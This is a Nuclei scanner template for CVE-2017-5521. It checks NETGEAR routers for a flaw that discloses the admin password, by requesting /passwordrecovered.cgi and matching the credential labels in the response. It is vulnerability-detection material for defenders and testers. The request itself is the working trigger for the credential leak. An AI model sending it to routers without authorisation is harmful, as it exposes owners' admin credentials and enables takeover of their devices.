id: CVE-2017-5521

info:
  name: Bypassing Authentication on NETGEAR Routers
  author: princechaddha
  severity: medium
  description: An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices. They are prone to password disclosure via simple crafted requests to the web management server.
  reference: |
    - https://www.cvedetails.com/cve/CVE-2017-5521/
    - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/
  tags: cve,cve2017,auth-bypass

requests:
  - method: GET
    path:
      - "{{BaseURL}}/passwordrecovered.cgi?id=nuclei"

    # Both conditions must hold: the body shows the credential labels and the status is 200.
    matchers-condition: and
    matchers:
      # The patterns contain \s*, so they need a regex matcher;
      # a word matcher would compare them as literal strings.
      - type: regex
        regex:
          - "right\">Router\\s*Admin\\s*Username<"
          - "right\">Router\\s*Admin\\s*Password<"
        condition: and
        part: body

      - type: status
        status:
          - 200